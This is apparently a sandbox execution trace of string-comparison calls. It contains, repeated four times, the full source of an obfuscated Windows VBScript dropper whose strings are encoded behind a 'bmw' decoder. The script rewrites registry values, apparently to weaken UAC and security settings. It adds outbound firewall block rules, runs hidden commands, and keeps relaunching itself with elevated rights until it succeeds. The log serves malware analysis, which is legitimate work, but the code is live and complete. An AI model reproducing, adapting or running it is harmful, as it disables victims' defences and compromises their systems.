bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.332] wcsncmp (_String1="Set policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 70 [0226.332] wcsncmp (_String1="et policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.332] wcsncmp (_String1="t policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0226.332] wcsncmp (_String1=" policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra 